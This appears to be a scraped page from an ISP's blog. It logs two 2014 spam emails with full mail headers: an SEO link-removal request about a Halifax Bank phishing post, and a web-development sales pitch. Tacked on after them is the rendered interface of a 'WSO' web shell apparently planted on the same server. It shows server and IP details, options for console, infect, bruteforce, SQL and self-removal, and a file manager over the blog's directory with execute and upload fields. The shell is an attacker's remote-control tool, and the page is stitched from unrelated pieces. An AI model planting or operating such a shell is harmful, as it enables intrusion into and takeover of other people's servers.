Scared Fraudsters write in panic!

From - Tue Mar 25 10:11:40 2014

X-Account-Key: account2

X-UIDL: 0005742e501fb806

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

X-Mozilla-Keys:

Return-path:

Envelope-to: sales@nk.ca

Delivery-date: Tue, 25 Mar 2014 10:10:01 -0600

Received: from oregon2.footholds.net ([91.146.107.68] helo=oregon.footholds.net)

by doctor.nl2k.ab.ca with esmtps (TLSv1:DHE-RSA-AES256-SHA:256)

(Exim 4.82)

(envelope-from )

id 1WSTvC-0006qi-8x

for sales@nk.ca; Tue, 25 Mar 2014 10:10:00 -0600

Received: from ec2-23-23-157-152.compute-1.amazonaws.com ([23.23.157.152]:43540 helo=www.buzzstream.com)

by oregon.footholds.net with esmtpsa (TLSv1:RC4-MD5:128)

(Exim 4.82)

(envelope-from )

id 1WSTuu-00018P-9k

for sales@nk.ca; Tue, 25 Mar 2014 16:09:40 +0000

From: MEC Outreach Team

Reply-To: MEC Outreach Team

To: sales@nk.ca

Message-ID: <855482165.2031.1395763773580.JavaMail.ec2-user@ip-10-108-171-6>

Subject: Important Reminder: Halifax Bank Link removal request

MIME-Version: 1.0

Content-Type: text/html; charset=UTF-8

Content-Transfer-Encoding: 7bit

X-OutGoing-Spam-Status: No, score=-0.4

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - oregon.footholds.net

X-AntiAbuse: Original Domain - nk.ca

X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]

X-AntiAbuse: Sender Address Domain - mecmanchester.co.uk

X-Get-Message-Sender-Via: oregon.footholds.net: authenticated_id: technical@mecmanchester.co.uk

X-Source:

X-Source-Args:

X-Source-Dir:



Hello,



I am just following up on the email below. Have you had a chance to take a look at my request to remove the link(s) to Halifax Bank from your site?



Please don’t hesitate to get in touch if you need any further assistance or require formal documentation from my client.  



Articles where links have been located:





  • edmontoninternetserviceprovider.ca/blog/index.php?/archives/763-More-Halifax-Banking-Phish.html


  • edmontoninternetserviceprovider.ca/blog/index.php?/archives/763-More-Halifax-Banking-Phish.html


  • edmontoninternetserviceprovider.ca/blog/index.php?/archives/763-More-Halifax-Banking-Phish.html




 
Regards, 



MEC Outreach Team
technical@mecmanchester.co.uk
Office: 01619309011
Bass Warehouse4 Castle St, Castlefield, Manchester,United Kingdom
http://www.mecglobal.com
A GroupM Company





SEO Amazon Spam

From - Tue Mar 18 03:50:15 2014

X-Account-Key: account2

X-UIDL: 00057304501fb806

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

X-Mozilla-Keys:

Return-path: <00000144d497ce82-6e8529b0-ce66-42c2-8e0b-86c05c7147ae-000000@amazonses.com>

Envelope-to: aboo@nk.ca

Delivery-date: Tue, 18 Mar 2014 03:49:29 -0600

Received: from a9-12.smtp-out.amazonses.com ([54.240.9.12])

by doctor.nl2k.ab.ca with esmtp (Exim 4.82)

(envelope-from <00000144d497ce82-6e8529b0-ce66-42c2-8e0b-86c05c7147ae-000000@amazonses.com>)

id 1WPqde-0006cz-PD

for aboo@nk.ca; Tue, 18 Mar 2014 03:49:28 -0600

From: bdm@webelephants.com

Reply-To: bdm@webelephants.com

To: aboo@nk.ca

Subject: Wordpress, Joomla , Magento and Drupal website development

projects

MIME-Version: 1.0

Content-Type: text/html; charset=UTF-8

Content-Transfer-Encoding: 7bit

Date: Tue, 18 Mar 2014 09:48:42 +0000

Message-ID: <00000144d497ce82-6e8529b0-ce66-42c2-8e0b-86c05c7147ae-000000@email.amazonses.com>

X-SES-Outgoing: 2014.03.18-54.240.9.12



Hi,





Elephant Consulting provides customised IT solutions in open source, website design and Mobile Application development. The solution includes IT consultancy, custom software development, onsite/offsite services, web development, software and web application testing . It is positioned to deliver rapid, reliable and robust information technology solution that work.





We have competencies following areas:





1. Wordpress: Customization,Template Design, Template Development,Website Development, Content Management Development,Content Management Maintenance,Support, Blog Corporate Branding





2. Joomla: Development, Customization, Content Management Maintenance and Support, Design, Development and Implementation of Joomla Stores, Custom Module Development, Custom Joomla Component Development, Hire Joomla Developer and designer





3. Magento: eCommerce Development, Store Design and Development, Custom Theme Design and Development, Custom Extension Development,Magento Customization, Third Part Payment Gateway Integration, Existing Magento Store Migration, Renovation/upgrade of existing Magento Store, Magento Installation, Integration and Deployment, Magento SEO Services, Magento Existing Store Maintenance Services





4.Drupal: Customization, Template Design, Template Development, Custom Module Development, Website Development, Content Management Development,SEO Services, Content Management Maintanance, Support





We provide all above solutions at very reasonable cost and quick turnaround time





Please visit our website : http://www.webelephants.com for more information





Please let us know if you have projects on open source development like Wordpress, Joomla, Magento, Drupal.





Regards,

Darshan Shastri | Business Manager Elephant Consulting | Skype: darshanshastri.ec







Email Id: darshan@webelephants.com





Postal Address: F/4 Nityanand, Opp. Sadhana School, Paldi, Ahmedabad-380006,India

To unsubscribe from the list Click Here.





www.nk.ca - WSO version
Uname:
User:
Php:
Hdd:
Cwd:
FreeBSD doctor.nl2k.ab.ca 12.2-RELEASE-p1 FreeBSD 12.2-RELEASE-p1 GENERIC amd64 [ Google ] [ Exploit-DB ]
80 ( www ) Group: 80 ( www )
7.4.14 Safe mode: OFF [ phpinfo ] Datetime: 2021-01-23 17:09:27
3390.11 GB Free: 1842.10 GB (54.34%)
/usr/local/www/nginx-dist/blog/ drwxr-xr-x [ home ]

Server IP:
204.209.81.1
Client IP:
3.221.159.255
[ Sec. Info ][ Files ][ Console ][ Infect ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

NameSizeModifyOwner/GroupPermissionsActions
[ .. ]dir2021-01-23 16:15:00www/wwwdr-xr-xr-xR T
[ archives ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ bundled-libs ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ deployment ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ docs ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ htmlarea ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ include ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ lang ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ plugins ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ sql ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ templates ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
[ templates_c ]dir2020-08-15 02:40:53www/wwwdrwxr-xr-xR T
[ uploads ]dir2020-08-15 01:31:14www/wwwdrwxr-xr-xR T
.gitignore291 B2020-08-12 14:20:00www/www-rw-r--r--R T F E D
.htaccess271 B2020-11-18 04:19:22www/www-rw-rw-rw-R T F E D
checksums.inc.php307.71 KB2020-08-15 02:40:51www/www-rw-r--r--R T F E D
CODE_OF_CONDUCT.md3.17 KB2020-08-15 02:40:49www/www-rw-r--r--R T F E D
comment.php9.46 KB2020-08-15 02:40:51www/www-rw-r--r--R T F E D
composer.json681 B2020-11-11 22:42:43www/www-rw-r--r--R T F E D
composer.json.orig681 B2020-08-15 02:40:51www/www-rw-r--r--R T F E D
composer.phar1.56 MB2020-08-15 02:40:51www/www-rw-r--r--R T F E D
CONTRIBUTING.md86 B2020-08-15 02:40:49www/www-rw-r--r--R T F E D
exit.php2.11 KB2020-08-15 02:40:51www/www-rw-r--r--R T F E D
index.php36.38 KB2020-11-18 04:15:41www/www-rw-r--r--R T F E D
LICENSE1.53 KB2020-08-15 02:40:49www/www-rw-r--r--R T F E D
README.markdown323 B2020-08-15 02:40:49www/www-rw-r--r--R T F E D
rss.php11.76 KB2020-08-15 02:40:52www/www-rw-r--r--R T F E D
serendipity.css.php3.90 KB2020-08-15 02:40:52www/www-rw-r--r--R T F E D
serendipity_admin.php8.88 KB2020-11-18 04:05:38www/www-rw-r--r--R T F E D
serendipity_admin_image_selector.php12.22 KB2020-08-15 02:40:52www/www-rw-r--r--R T F E D
serendipity_config.inc.php19.65 KB2020-11-18 04:24:52www/www-rw-r--r--R T F E D
serendipity_config_local.inc.php899 B2020-11-18 04:19:21www/www-rwx------R T F E D
serendipity_xmlrpc.php432 B2020-11-18 04:06:02www/www-rw-r--r--R T F E D
wfwcomment.php1.40 KB2020-08-15 02:40:53www/www-rw-r--r--R T F E D
Change dir:
Read file:
Make dir: [ Writeable ]
Make file: [ Writeable ]
Execute:
Upload file: [ Writeable ]